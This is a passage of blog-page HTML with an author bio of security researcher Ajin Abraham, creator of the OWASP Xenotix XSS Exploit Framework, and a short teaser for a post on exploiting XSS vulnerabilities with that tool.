mso-symbol-font-family: Wingdings;"><span style="mso-char-type: symbol; mso-symbol-font-family: Wingdings;">J</span></span><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></div><div class="MsoNormal"><br /></div><h4> </h4><h4 class="MsoNormal"><span style="font-size: 16.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 14.0pt; mso-bidi-theme-font: minor-latin;">About Ajin Abraham</span></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India <a href="https://www.blogger.com/blogger.g?blogID=3121270199089759062" name="_GoBack"></a>2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.</span><span lang="EN-GB" style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"></span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></div><div class="MsoNormal"></div></div>

Exploiting XSS Vulnerabilites With Xenotix

Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3 rd Vulne...

+ Read more »